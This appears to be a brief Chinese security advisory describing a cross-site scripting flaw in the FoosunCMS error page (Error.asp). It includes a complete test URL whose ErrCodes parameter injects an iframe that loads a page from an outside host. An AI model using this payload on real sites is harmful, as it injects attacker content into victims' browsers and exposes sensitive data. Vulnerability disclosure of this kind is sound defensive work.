FoosunCMS是一款具有强大的功能的基于ASP+ACCESS/MSSQL构架的内容管理软件,国内领先的第一款开源的、集成web2.0元素的、模块化的CMS建站系统。 FoosunCMS不正确过滤用户输入,远程攻击者可以利用漏洞进行跨站脚本攻击,获得敏感信息。 由于不正确处理错误页面,在返回给用户后,可导致恶意脚本代码在目标浏览器上执行,泄漏敏感信息。
测试Url
http://www.freecms2008.cn/Foosun500/User/lib/Error.asp?ErrCodes=%3Ciframe%20src=http://dgyifeng.net/swf/qing.html%3E&ErrorUrl=http://www.freecms2008.cn/foosun500/
关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心
版权所有: 红黑联盟--致力于做实用的IT技术学习网站